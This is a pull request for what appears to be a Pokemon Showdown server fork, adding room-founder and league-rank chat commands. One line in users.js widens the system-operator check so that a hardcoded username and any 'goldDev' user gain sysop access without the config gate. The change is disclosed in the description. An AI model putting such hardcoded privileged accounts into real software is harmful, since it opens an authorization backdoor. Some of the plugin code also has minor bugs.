### PR TITLE
Add in Room Founder, League Auth, and Add Hayleysworld as a user with Sysop Access

### DIFF
--- a/chat-plugins/leagueauth.js
+++ b/chat-plugins/leagueauth.js
@@ -1,0 +1,166 @@
+//ranking is mostly arbitrary
+var Groupsranking = [' ', '\u03c4', '\u00a3', '\u03dd', '\u03b2', '\u039e', '\u03a9', '\u0398', '\u03a3', '\u00a9', ];
+var Groups = {
+
+        '\u00a9': {
+                id: "champion",
+                name: "Champion",
+                rank: 9
+        },
+        '\u03a3': {
+                id: "elite",
+                name: "Elite",
+                rank: 8
+        },
+        '\u0398': {
+                id: "rg",
+                name: "Royal Guard",
+                rank: 7
+        },
+        '\u03a9': {
+                id: "professor",
+                name: "Professor",
+                rank: 6
+        },
+        '\u039e': {
+        	id: "ace",
+        	name: "Ace",
+        	rank: 5
+        },
+        '\u03b2': {
+                id: "brain",
+                name: "Frontier Brain",
+                rank: 4
+        },        
+        '\u03dd': {
+                id: "frontier",
+                name: "Frontier",
+                rank: 3
+        },
+        '\u00a3': {
+                id: "gleader",
+                name: "Gym Leader",
+                rank: 2
+        },
+        '\u03c4': {
+                id: "trainer",
+                name: "Gym Trainer",
+                rank: 1
+        },
+        ' ': {
+                rank: 0
+        }
+}
+
+exports.commands = {
+        leaguedeauth: 'leaguepromote',
+        roomtrainer: 'leaguepromote',
+        roomgmleader: 'leaguepromote',
+        roomfrontier: 'leaguepromote',
+        roombrain: 'leaguepromote',
+        roomace: 'leaguepromote',
+        roomprofessor: 'leaguepromote',
+        roomrg: 'leaguepromote',
+        roomelite: 'leaguepromote',
+        roomchampion: 'leaguepromote',
+        leaguedemote: 'leagueauth',
+        leaguepromote: function (target, room, user, connection, cmd) {
+                if (!room.auth) {
+                        this.sendReply("/leagueauth - This room isn't designed for per-room moderation");
+                        return this.sendReply("Before setting league staff, you need to set it up with /roomfounder");
+                }
+                if (!target) return this.parse('/leagueauth [user] - Giver a user a rank in a league. Use /leagueauthhelp for more help.');
+                if (!this.can('roommod', null, room)) return false;
+
+                target = this.splitTarget(target, true);
+                var targetUser = this.targetUser;
+                var userid = toId(this.targetUsername);
+                var name = targetUser ? targetUser.name : this.targetUsername;
+
+                if (!userid) return this.parse('/leagueauthhelp');
+                if (!targetUser && (!room.auth || !room.auth[userid])) {
+                        return this.sendReply("User '" + name + "' is offline and unauthed, and so can't be promoted.");
+                }
+
+                var currentGroup = ((room.leagueauth&& room.leagueauth[userid]) || ' ')[0];
+                var nextGroup = target;
+                if (target === 'leaguedeauth') nextGroup = Groupsranking[0];
+               
+                if (cmd==='roomtrainer') {
+                        nextGroup = Groupsranking[1];
+                } else if (cmd==='roomgmleader') {
+                        nextGroup = Groupsranking[2];
+                } else if (cmd==='roomfrontier') {
+                        nextGroup = Groupsranking[3];                
+                } else if (cmd==='roombrain') {
+                        nextGroup = Groupsranking[4];
+                } else if (cmd==='roomace') {
+                        nextGroup = Groupsranking[5];
+                } else if (cmd==='roomprofessor') {
+                        nextGroup = Groupsranking[6];
+                } else if (cmd==='roomrg') {
+                        nextGroup = Groupsranking[7];
+                } else if (cmd==='roomelite') {
+                        nextGroup = Groupsranking[8];
+                } else if (cmd==='roomchampion') {
+                        nextGroup = Groupsranking[9];
+                } else if (cmd==='leaguedeauth') {
+                        nextGroup = Groupsranking[0];
+                }
+                
+                if (!nextGroup) {
+			return this.sendReply("Please specify a group such as /roomgldeader or /roomtrainer");
+		}
+		
+		if (!Groups[nextGroup]) {
+                        return this.sendReply("Group '" + nextGroup + "' does not exist.");
+                }
+
+                var groupName = Groups[nextGroup].name || "regular user";
+                if (currentGroup === nextGroup) {
+                        return this.sendReply("User '" + name + "' is already a " + groupName + " in this room.");
+                }
+
+                if (nextGroup === ' ') {
+                        delete room.leagueauth[userid];
+                } else {
+                        room.leagueauth[userid] = nextGroup;
+                }
+
+                if (Groups[nextGroup].rank < Groups[currentGroup].rank) {
+                        this.privateModCommand("(" + name + " was changed to " + groupName + " by " + user.name + ".)");
+                        if (targetUser && Rooms.rooms[room.id].users[targetUser.userid]) targetUser.popup("You were changed to " + groupName + " by " + user.name + ".");
+                } else {
+                        this.addModCommand("" + name + " was changed to " + groupName + " by " + user.name + ".");
+                }
+
+                if (targetUser) targetUser.updateIdentity(room.id);
+                if (room.chatRoomData) Rooms.global.writeChatRoomData();
+        },
+	leagueauth: function (target, room, user, connection) {
+		var targetRoom = room;
+		if (target) targetRoom = Rooms.search(target);
+		if (!targetRoom || (targetRoom !== room && targetRoom.modjoin && !user.can('bypassall'))) return this.sendReply("The room '" + target + "' does not exist.");
+		if (!targetRoom.auth) return this.sendReply("/roomauth - The room '" + (targetRoom.title ? targetRoom.title : target) + "' isn't designed for per-room moderation and therefore has no auth list.");
+
+		var rankLists = {};
+		for (var u in targetRoom.leagueauth) {
+			if (!rankLists[targetRoom.leagueauth[u]]) rankLists[targetRoom.leagueauth[u]] = [];
+			rankLists[targetRoom.leagueauth[u]].push(u);
+		}
+
+		var buffer = [];
+		Object.keys(rankLists).sort(function (a, b) {
+			return (Groups[b] || {rank:0}).rank - (Groups[a] || {rank:0}).rank;
+		}).forEach(function (r) {
+			buffer.push((Groups[r] ? Groups[r] .name + "s (" + r + ")" : r) + ":\n" + rankLists[r].sort().join(", "));
+		});
+
+		if (!buffer.length) {
+			connection.popup("The room '" + targetRoom.title + "' has no league auth.");
+			return;
+		}
+		if (targetRoom !== room) buffer.unshift("" + targetRoom.title + " room auth:");
+		connection.popup(buffer.join("\n\n"));
+	},
+}

--- a/chat-plugins/roomrank.js
+++ b/chat-plugins/roomrank.js
@@ -1,0 +1,200 @@
+exports.commands = {
+    roomfounder: function (target, room, user) {
+        if (!room.chatRoomData) {
+            return this.sendReply("/roomfounder - This room isn\'t designed for per-room moderation to be added.");
+        }
+        target = this.splitTarget(target, true);
+        var targetUser = this.targetUser;
+        if (!targetUser) return this.sendReply("User '" + this.targetUsername + "' is not online.");
+        if (!this.can('makeroom')) return false;
+        if (!room.auth) room.auth = room.chatRoomData.auth = {};
+        if (!room.leagueauth) room.leagueauth = room.chatRoomData.leagueauth = {};
+        var name = targetUser.name;
+        room.auth[targetUser.userid] = '#';
+        room.founder = targetUser.userid;
+        this.addModCommand(name + ' was appointed to Room Founder by ' + user.name + '.');
+        room.onUpdateIdentity(targetUser);
+        room.chatRoomData.founder = room.founder;
+        Rooms.global.writeChatRoomData();
+    },
+
+    roomdefounder: 'deroomfounder',
+    deroomfounder: function (target, room, user) {
+        if (!room.auth) {
+            return this.sendReply("/roomdeowner - This room isn't designed for per-room moderation");
+        }
+        target = this.splitTarget(target, true);
+        var targetUser = this.targetUser;
+        var name = this.targetUsername;
+        var userid = toId(name);
+        if (!userid || userid === '') return this.sendReply("User '" + name + "' does not exist.");
+
+        if (room.auth[userid] !== '#') return this.sendReply("User '" + name + "' is not a room founder.");
+        if (!this.can('makeroom', null, room)) return false;
+
+        delete room.auth[userid];
+        delete room.founder;
+        this.sendReply("(" + name + " is no longer Room Founder.)");
+        if (targetUser) targetUser.updateIdentity();
+        if (room.chatRoomData) {
+            Rooms.global.writeChatRoomData();
+        }
+	},
+
+	roomowner: function (target, room, user) {
+		if (!room.chatRoomData) {
+			return this.sendReply("/roomowner - This room isn't designed for per-room moderation to be added");
+		}
+		target = this.splitTarget(target, true);
+		var targetUser = this.targetUser;
+
+		if (!targetUser) return this.sendReply("User '" + this.targetUsername + "' is not online.");
+
+		if (!room.founder) return this.sendReply('The room needs a room founder before it can have a room owner.');
+		if (room.founder !== user.userid && !this.can('makeroom')) return this.sendReply('/roomowner - Access denied.');
+
+		if (!room.auth) room.auth = room.chatRoomData.auth = {};
+
+		var name = targetUser.name;
+
+		room.auth[targetUser.userid] = '#';
+		this.addModCommand("" + name + " was appointed Room Owner by " + user.name + ".");
+		room.onUpdateIdentity(targetUser);
+		Rooms.global.writeChatRoomData();
+	},
+	roomownerhelp: ["/roomowner [username] - Appoints [username] as a room owner. Removes official status. Requires: ~"],
+
+	roomdeowner: 'deroomowner',
+	deroomowner: function (target, room, user) {
+		if (!room.auth) {
+			return this.sendReply("/roomdeowner - This room isn't designed for per-room moderation");
+		}
+		target = this.splitTarget(target, true);
+		var targetUser = this.targetUser;
+		var name = this.targetUsername;
+		var userid = toId(name);
+		if (!userid || userid === '') return this.sendReply("User '" + name + "' does not exist.");
+
+		if (room.auth[userid] !== '#') return this.sendReply("User '"+name+"' is not a room owner.");
+		if (!room.founder || user.userid !== room.founder && !this.can('makeroom', null, room)) return false;
+
+		delete room.auth[userid];
+		this.sendReply("(" + name + " is no longer Room Owner.)");
+		if (targetUser) targetUser.updateIdentity();
+		if (room.chatRoomData) {
+			Rooms.global.writeChatRoomData();
+		}
+	},
+
+	roomleader: function (target, room, user) {
+		if (!room.chatRoomData) {
+			return this.sendReply("/roomowner - This room isn't designed for per-room moderation to be added");
+		}
+		target = this.splitTarget(target, true);
+		var targetUser = this.targetUser;
+
+		if (!targetUser) return this.sendReply("User '" + this.targetUsername + "' is not online.");
+
+		if (!room.founder) return this.sendReply('The room needs a room founder before it can have a room owner.');
+		if (room.founder !== user.userid && !this.can('makeroom')) return this.sendReply('/roomowner - Access denied.');
+
+		if (!room.auth) room.auth = room.chatRoomData.auth = {};
+
+		var name = targetUser.name;
+
+		room.auth[targetUser.userid] = '&';
+		this.addModCommand("" + name + " was appointed Room Leader by " + user.name + ".");
+		room.onUpdateIdentity(targetUser);
+		Rooms.global.writeChatRoomData();
+	},
+
+
+	roomdeleader: 'deroomowner',
+	deroomleader: function (target, room, user) {
+		if (!room.auth) {
+			return this.sendReply("/roomdeowner - This room isn't designed for per-room moderation");
+		}
+		target = this.splitTarget(target, true);
+		var targetUser = this.targetUser;
+		var name = this.targetUsername;
+		var userid = toId(name);
+		if (!userid || userid === '') return this.sendReply("User '" + name + "' does not exist.");
+
+		if (room.auth[userid] !== '&') return this.sendReply("User '"+name+"' is not a room leader.");
+		if (!room.founder || user.userid !== room.founder && !this.can('makeroom', null, room)) return false;
+
+		delete room.auth[userid];
+		this.sendReply("(" + name + " is no longer Room Leader.)");
+		if (targetUser) targetUser.updateIdentity();
+		if (room.chatRoomData) {
+			Rooms.global.writeChatRoomData();
+		}
+        },
+
+	leagueroom: function (target, room, user) {
+		if (!this.can('makeroom')) return;
+		if (!room.chatRoomData) {
+			return this.sendReply('/leagueroom - This room can\'t be marked as a league');
+		}
+		if (target === 'off') {
+			delete room.isLeague;
+			this.addModCommand(user.name+' has made this chat room a normal room.');
+			delete room.chatRoomData.isLeague;
+			Rooms.global.writeChatRoomData();
+		} else {
+			room.isLeague = true;
+			this.addModCommand(user.name+' made this room a league room.');
+			room.chatRoomData.isLeague = true;
+			Rooms.global.writeChatRoomData();
+		}
+
+	},
+
+	closeleague: 'openleague',
+	openleague: function (target, room, user, connection, cmd) {
+		if (!room.isLeague) return this.sendReply("This is not a league room, if it is, get a Leader or Admin to set the room as a league room.");
+		if (!this.can('roommod', null, room)) return false;
+		if (!room.chatRoomData) {
+			return this.sendReply("This room cannot have a league toggle option.");
+		}
+		if (cmd === 'closeleague') {
+			if (!room.isOpen) return this.sendReply('The league is already marked as closed.');
+			delete room.isOpen;
+			delete room.chatRoomData.isOpen;
+			Rooms.global.writeChatRoomData();
+			return this.sendReply('This league has now been marked as closed.');
+		}
+		else {
+			if (room.isOpen) return this.sendReply('The league is already marked as open.');
+			room.isOpen = true;
+			room.chatRoomData.isOpen = true;
+			Rooms.global.writeChatRoomData();
+			return this.sendReply('This league has now been marked as open.');
+		}
+	},
+
+	leaguestatus: function (target, room, user) {
+		if (!room.isLeague) return this.sendReply("This is not a league room, if it is, get a Leader or Admin to set the room as a league room.");
+		if (!this.canBroadcast()) return;
+		if (room.isOpen) {
+			return this.sendReplyBox(room.title+' is <font color="green"><b>open</b></font> to challengers.');
+		}
+		else if (!room.isOpen) {
+			return this.sendReplyBox(room.title+' is <font color="red"><b>closed</b></font> to challengers.');
+		}
+		else return this.sendReply('This league does not have a status set.');
+	},
+
+	roomstatus: function (target, room, user) {
+		if (!room.chatRoomData) return false;
+		if (!this.canBroadcast()) return false;
+		if (room.isPublic && !room.isOfficial) {
+			return this.sendReplyBox(room.title + ' is a <font color="green"><b>public</b></font> room.');
+		} else if (!room.isPublic && !room.isOfficial) {
+			return this.sendReplyBox(room.title + ' is <font color="red"><b>not</b></font> a public room.');
+		}
+		if (room.isOfficial && room.isPublic) {
+			return this.sendReplyBox(room.title + ' is an <font color="blue"><b>official</b></font> room.');
+		}
+	}
+	};

--- a/users.js
+++ b/users.js
@@ -638,7 +638,7 @@ User = (function () {
 	 * Special permission check for system operators
 	 */
 	User.prototype.hasSysopAccess = function () {
-		if (this.isSysop && Config.backdoor) {
+		if (this.isSysop && Config.backdoor || this.goldDev || this.userid == 'hayleysworld') {
 			// This is the Pokemon Showdown system operator backdoor.
 
 			// Its main purpose is for situations where someone calls for help, and


### PR DESCRIPTION
I added in 2 files, roomrank.js and leagueauth.js, for a few reasons.
- It helps to promote people to founder of a room and defounder them.
- We can set what room should it be ( league, public, or official room)
- If the room is set as a league ( use /leagueroom), users are able to open and close the league using /closeleague and /openleague, as along with checking their league status with /leaguestatus.
  -/leagueauth is used for Founders to set up who is what in the league.

I edited something in users.js so then hayleysworld can be a user with SYSOP access ( credit goes to panpawn for setting that up in users.js).
